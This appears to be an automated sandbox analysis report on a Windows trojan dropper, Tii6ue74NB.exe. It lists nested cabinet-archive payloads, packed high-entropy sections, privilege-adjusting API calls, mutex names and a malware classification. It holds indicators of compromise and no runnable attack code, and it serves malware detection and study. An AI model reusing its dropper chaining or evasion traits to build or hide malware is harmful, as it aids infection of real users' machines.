                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00623BA21_2_00623BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00625C9E1_2_00625C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E3BA22_2_003E3BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E5C9E2_2_003E5C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006F88603_2_006F8860
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006F70493_2_006F7049
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006F78BB3_2_006F78BB
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_007C81013_2_007C8101
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006F31A83_2_006F31A8
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_007C7B6E3_2_007C7B6E
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006B4B303_2_006B4B30
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006F2D103_2_006F2D10
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006B4DE03_2_006B4DE0
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006E7F363_2_006E7F36
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: 3_2_006F779B3_2_006F779B
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF56BE010_2_6BF56BE0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEF0BA010_2_6BEF0BA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BECEA8010_2_6BECEA80
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BECCA7010_2_6BECCA70
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF08A3010_2_6BF08A30
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEFEA0010_2_6BEFEA00
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF6C9E010_2_6BF6C9E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE849F010_2_6BE849F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF109B010_2_6BF109B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE09A010_2_6BEE09A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF0A9A010_2_6BF0A9A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE8896010_2_6BE88960
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEA690010_2_6BEA6900
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF568E010_2_6BF568E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2484010_2_6BF24840
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEA082010_2_6BEA0820
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEDA82010_2_6BEDA820
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2EFF010_2_6BF2EFF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE50FE010_2_6BE50FE0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF98FB010_2_6BF98FB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE5EFB010_2_6BE5EFB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF12F7010_2_6BF12F70
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEBEF4010_2_6BEBEF40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF90F2010_2_6BF90F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE56F1010_2_6BE56F10
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE5AEC010_2_6BE5AEC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEF0EC010_2_6BEF0EC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BED6E9010_2_6BED6E90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEEEE7010_2_6BEEEE70
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF30E2010_2_6BF30E20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFDCDC010_2_6BFDCDC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE54DB010_2_6BE54DB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE6D9010_2_6BEE6D90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF1ED7010_2_6BF1ED70
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF7AD5010_2_6BF7AD50
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD8D2010_2_6BFD8D20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE4ECC010_2_6BE4ECC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEAECD010_2_6BEAECD0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE5AC6010_2_6BE5AC60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2AC3010_2_6BF2AC30
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF16C0010_2_6BF16C00
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEA43E010_2_6BEA43E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE823A010_2_6BE823A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEAE3B010_2_6BEAE3B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF9237010_2_6BF92370
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE5237010_2_6BE52370
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF6C36010_2_6BF6C360
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE637010_2_6BEE6370
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE5834010_2_6BE58340
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEC232010_2_6BEC2320
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD62C010_2_6BFD62C0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF1E2B010_2_6BF1E2B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF222A010_2_6BF222A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BED826010_2_6BED8260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE825010_2_6BEE8250
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2822010_2_6BF28220
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF1A21010_2_6BF1A210
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE501E010_2_6BE501E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB814010_2_6BEB8140
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF3413010_2_6BF34130
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEC613010_2_6BEC6130
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2C0B010_2_6BF2C0B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE600B010_2_6BE600B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE4809010_2_6BE48090
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE9E07010_2_6BE9E070
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF1801010_2_6BF18010
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF1C00010_2_6BF1C000
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE7A7D010_2_6BE7A7D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BED070010_2_6BED0700
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEAE6E010_2_6BEAE6E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEEE6E010_2_6BEEE6E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE746D010_2_6BE746D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEAC65010_2_6BEAC650
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF1A5E010_2_6BF1A5E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEDE5F010_2_6BEDE5F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE445B010_2_6BE445B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB256010_2_6BEB2560
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEF057010_2_6BEF0570
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF9855010_2_6BF98550
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEA854010_2_6BEA8540
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF5454010_2_6BF54540
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE964D010_2_6BE964D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEEA4D010_2_6BEEA4D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF7A48010_2_6BF7A480
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE6846010_2_6BE68460
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB442010_2_6BEB4420
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEDA43010_2_6BEDA430
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE97BF010_2_6BE97BF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF19BB010_2_6BF19BB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEA9BA010_2_6BEA9BA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF35B9010_2_6BF35B90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE41B8010_2_6BE41B80
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2FB6010_2_6BF2FB60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE9BB2010_2_6BE9BB20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE51AE010_2_6BE51AE0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2DAB010_2_6BF2DAB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD9A5010_2_6BFD9A50
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF4DA3010_2_6BF4DA30
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE8FA1010_2_6BE8FA10
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB59F010_2_6BEB59F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE79F010_2_6BEE79F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE99C010_2_6BEE99C0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE899D010_2_6BE899D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2199010_2_6BF21990
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE6198010_2_6BE61980
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BECF96010_2_6BECF960
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF0D96010_2_6BF0D960
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF0592010_2_6BF05920
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF9F90010_2_6BF9F900
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2F8F010_2_6BF2F8F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE5D8E010_2_6BE5D8E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE838E010_2_6BE838E0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFAB8F010_2_6BFAB8F0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEAD81010_2_6BEAD810
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEFBFF010_2_6BEFBFF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF6DFC010_2_6BF6DFC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD3FC010_2_6BFD3FC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE71F9010_2_6BE71F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE85F2010_2_6BE85F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE45F3010_2_6BE45F30
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFA7F2010_2_6BFA7F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE73EC010_2_6BE73EC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFABE7010_2_6BFABE70
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BFD5E6010_2_6BFD5E60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF5DE1010_2_6BF5DE10
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF21DC010_2_6BF21DC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE43D8010_2_6BE43D80
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF99D9010_2_6BF99D90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEB3D0010_2_6BEB3D00
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF11CE010_2_6BF11CE0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF8DCD010_2_6BF8DCD0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE53C4010_2_6BE53C40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF79C4010_2_6BF79C40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BE61C3010_2_6BE61C30
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeCode function: 12_3_01115A7F12_3_01115A7F
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeCode function: String function: 006C80C0 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: String function: 6BE73620 appears 93 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: String function: 6BEAC5E0 appears 34 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: String function: 6BF89F30 appears 50 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: String function: 6BE79B10 appears 93 times
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 872
                              Source: Tii6ue74NB.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 7136531 bytes, 2 files, at 0x2c +A "i9z22.exe" +A "4l693L.exe", ID 1518, number 1, 221 datablocks, 0x1503 compression
                              Source: i9z22.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 5319754 bytes, 2 files, at 0x2c +A "P0D95.exe" +A "3m20j.exe", ID 1406, number 1, 204 datablocks, 0x1503 compression
                              Source: P0D95.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 3557754 bytes, 2 files, at 0x2c +A "1I15f6.exe" +A "2i7672.exe", ID 1485, number 1, 149 datablocks, 0x1503 compression
                              Source: Tii6ue74NB.exe, 00000000.00000003.1816472472.0000000000969000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs Tii6ue74NB.exe
                              Source: Tii6ue74NB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: random[1].exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: fc1570cd0d.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4l693L.exe.0.drStatic PE information: Section: qpxzdhbb ZLIB complexity 0.994618988948626
                              Source: 1I15f6.exe.2.drStatic PE information: Section: ZLIB complexity 0.9983448995231607
                              Source: 2i7672.exe.2.drStatic PE information: Section: ZLIB complexity 0.9973512414383562
                              Source: 2i7672.exe.2.drStatic PE information: Section: jxigntbe ZLIB complexity 0.9947052139792232
                              Source: skotes.exe.3.drStatic PE information: Section: ZLIB complexity 0.9983448995231607
                              Source: random[1].exe.4.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: random[1].exe.4.drStatic PE information: Section: xnuzvlhe ZLIB complexity 0.994702490860937
                              Source: 5813f66ed1.exe.4.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: 5813f66ed1.exe.4.drStatic PE information: Section: xnuzvlhe ZLIB complexity 0.994702490860937
                              Source: random[1].exe0.4.drStatic PE information: Section: souunsyz ZLIB complexity 0.9948484726974622
                              Source: 941d08ea4f.exe.4.drStatic PE information: Section: souunsyz ZLIB complexity 0.9948484726974622
                              Source: random[1].exe2.4.drStatic PE information: Section: ZLIB complexity 0.9951784478782287
                              Source: random[1].exe2.4.drStatic PE information: Section: vxwcoufq ZLIB complexity 0.9927145899440919
                              Source: ae64e67a81.exe.4.drStatic PE information: Section: ZLIB complexity 0.9951784478782287
                              Source: ae64e67a81.exe.4.drStatic PE information: Section: vxwcoufq ZLIB complexity 0.9927145899440919
                              Source: random[2].exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: random[2].exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: 7ab555facf.exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: 7ab555facf.exe.4.drStatic PE information: Section: .bss ZLIB complexity 1.0003407005613125
                              Source: random[3].exe.10.drStatic PE information: Section: ZLIB complexity 0.9983448995231607
                              Source: HIDGCFBFBF.exe.10.drStatic PE information: Section: ZLIB complexity 0.9983448995231607
                              Source: random[1].exe2.4.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: ae64e67a81.exe.4.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                              Source: 3800cab1bc.exe.4.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: 3800cab1bc.exe.4.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: random[2].exe0.4.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: random[2].exe0.4.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: ae64e67a81.exe, 00000013.00000003.2340280540.0000000004AB8000.00000004.00001000.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000002.2381053690.0000000000069000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                              Source: ae64e67a81.exe, 00000013.00000003.2340280540.0000000004AB8000.00000004.00001000.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000002.2381053690.0000000000069000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@100/54@28/16
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00DF3FEF
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00DF1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00621F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00621F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_003E1F90
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00DF597D
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00DF4FE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\service123.exeMutant created: \Sessions\1\BaseNamedObjects\ZskYHDdAyzNgPKSWMWId
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeMutant created: \Sessions\1\BaseNamedObjects\80065eb12166c1a5
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6440
                              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-41f5ca1f-12f2-e123ed-b12badd5efaa}
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
